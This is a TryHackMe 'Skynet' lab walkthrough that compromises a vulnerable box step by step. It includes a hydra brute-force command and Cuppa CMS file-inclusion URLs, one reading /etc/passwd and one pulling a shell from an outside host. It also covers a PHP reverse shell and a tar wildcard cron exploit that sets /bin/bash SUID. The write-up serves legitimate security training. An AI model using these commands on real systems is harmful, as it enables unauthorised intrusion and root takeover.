SkyNet | Advanced Exploitation | TryHackMe

Iam_Wander
4 min read · Jul 28, 2023


In this room, we are going to exploit a vulnerable Terminator-themed Linux machine.

To begin, we visit the website and learn what we can about it. In this case the home page is just a search portal with nothing obviously exploitable, so we look for open ports first and, if they give us nothing interesting, enumerate for hidden directories.

The Nmap results show that the SMB ports are open, so the first step is to enumerate the Samba shares.

smbmap -H <target ip>

This gives us three Samba shares: print$, anonymous and milesdyson.

In this case, we are interested in milesdyson and anonymous. Let's try logging in to them.

smbclient //10.10.188.144/anonymous

Bingo, we are in. Let's look around.

We find a file, attention.txt, and a logs directory. Let's have a look.

attention.txt is a notice telling Miles Dyson to change his password, and logs/log1.txt looks like a list of stored passwords, most likely candidates for that account. What we need now is the login page; then we can use hydra to try the list against the user milesdyson.

Luckily, gobuster directory enumeration turns up an interesting directory, squirrelmail, which leads us to a login page.

hydra -l milesdyson -P /root/log1.txt 10.10.188.144 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or Password" -t 64

The string after the last colon, Unknown user or Password, is the text SquirrelMail returns on a failed login; hydra treats any response without it as a hit. Note that -t 64 is aggressive for a web form, so if the results look inconsistent, lower the task count and rerun. Hydra finds the password: milesdyson : cyborg007haloterminator. Let's log in to SquirrelMail with it.

We are in. One of the mails contains Miles Dyson's new Samba password, so we can log in to the milesdyson share and look for interesting files there.

smbclient //10.10.253.120/milesdyson -U milesdyson

In his notes directory, a text file named important.txt stands out.

It points to a web directory that seems to be a site still in beta: /45kra24zxs28v3yd

Visiting the newly discovered directory only shows some kind of image. A placeholder page like this often hides more under it, so let's run gobuster against the new directory as well.

We find another subdirectory, administrator, which serves a Cuppa CMS login page.

Trying the passwords we already have gets us nowhere, so let's check whether there is a known exploit for Cuppa CMS.

$ searchsploit cuppa cms
$ searchsploit -x 25971.txt

The entry shows that Cuppa CMS has a file inclusion vulnerability: the urlConfig parameter of alerts/alertConfigField.php is passed to a PHP include without validation, so it can point at a local file (LFI) or a remote URL (RFI). Remote inclusion of a file we control gives us code execution. Let's look at the usage instructions:

http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

Time to prepare a PHP reverse shell with LPORT=4444 and LHOST set to your attacker machine's IP.

Start a web server to host the shell and a netcat listener on the same port. Serve the payload with a .txt extension, as the exploit's own example does (shell.txt): if you host it as .php on a PHP-enabled web server, your server will execute it instead of handing the source to the target.

Once everything is set, request the vulnerable page as shown in the exploit usage. The Cuppa root on this box is /45kra24zxs28v3yd/administrator, so the request goes to .../administrator/alerts/alertConfigField.php with urlConfig pointing at http://<attacker ip>/<payload>. The trailing ? in the exploit's example is the usual RFI trick: anything the application appends to the URL becomes a harmless query string.

Hurrah, we get our initial shell as www-data, but it needs to be stabilised.

python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo; fg
export TERM=xterm

With the shell stabilised we can move around the filesystem, but www-data is not enough: we need to escalate to root.

To find a path, let's transfer linpeas to the target and see what it reports.

Interestingly, it shows a cron job running a script, /home/milesdyson/backups/backup.sh, as root every minute.

Let's cat it and see what it contains.

backup.sh runs as root every minute and calls tar with an unquoted wildcard, which is what we will abuse:

#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

Let's visit https://gtfobins.github.io/ and look up tar. The relevant trick is the --checkpoint-action=exec=... option, which makes tar run a command of our choosing at each checkpoint.

Note that the files must be created in /var/www/html, the directory backup.sh changes into before running tar, not in the backups directory: the wildcard expands there, so that is where our file names end up on tar's command line.

Once in that directory, we drop a small script that sets the SUID bit on /bin/bash, plus two empty files whose names tar will parse as options when the shell expands *. The next time the cron job runs, root's tar executes our script.

printf '#!/bin/bash\nchmod +s /bin/bash' > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

Wait a minute for the cron job to fire, then check that /bin/bash now shows the s bit in its permissions and start a shell that keeps the effective uid:

/bin/bash -p

and now we are root…
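To see why those two file names give root, here is an added example that reproduces the trick locally, as an unprivileged user, in a scratch directory. It is not code from the original post or from the room: the directory names and the marker file are assumptions, and the payload only creates a marker file in place of chmod +s /bin/bash. It assumes GNU tar, since --checkpoint-action is a GNU extension, and it runs the same command backup.sh runs, tar cf <archive> *, against a directory that stands in for /var/www/html.

```shell
#!/bin/sh
# Added example, not from the original post. Reproduces the tar wildcard
# injection locally: the "backup" command is run by the current user and the
# payload just drops a marker file instead of chmod +s /bin/bash.

wildcard_demo() {
    work=$(mktemp -d) || return 1
    marker="$work/ran-by-tar.txt"        # assumed name; proves shell.sh ran

    # Stand-in for /var/www/html, the directory backup.sh archives.
    src="$work/html"
    mkdir "$src"
    echo "index" > "$src/index.html"

    # 1. The payload tar will execute. On Skynet this is `chmod +s /bin/bash`.
    printf '#!/bin/sh\ntouch "%s"\n' "$marker" > "$src/shell.sh"

    # 2. Two files whose *names* are GNU tar options. When the shell expands
    #    the unquoted `*`, they land on tar's command line and GNU tar parses
    #    them as options (it accepts options after operands), not file names.
    echo "" > "$src/--checkpoint-action=exec=sh shell.sh"
    echo "" > "$src/--checkpoint=1"

    # 3. The victim command, exactly as backup.sh runs it (unquoted wildcard).
    #    The exec action runs `sh shell.sh` through /bin/sh in the current dir.
    ( cd "$src" && tar cf "$work/backup.tgz" * ) 2>/dev/null || true

    # Give a slow child a moment in case tar did not wait for it.
    [ -f "$marker" ] || sleep 1

    # Success means the marker exists: tar executed our script.
    if [ -f "$marker" ]; then
        rm -rf "$work"
        return 0
    fi
    rm -rf "$work"
    return 1
}

if wildcard_demo; then
    echo "tar executed shell.sh via --checkpoint-action"
else
    echo "no execution (non-GNU tar, or the checkpoint never fired)"
fi
```

Run it as any user; nothing outside the temporary directory is touched. The defence is the same as the offence in reverse: quote or avoid wildcards in privileged scripts (tar cf backup.tgz -- * or tar cf backup.tgz .), and never let an unprivileged user write into a directory that root tars.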
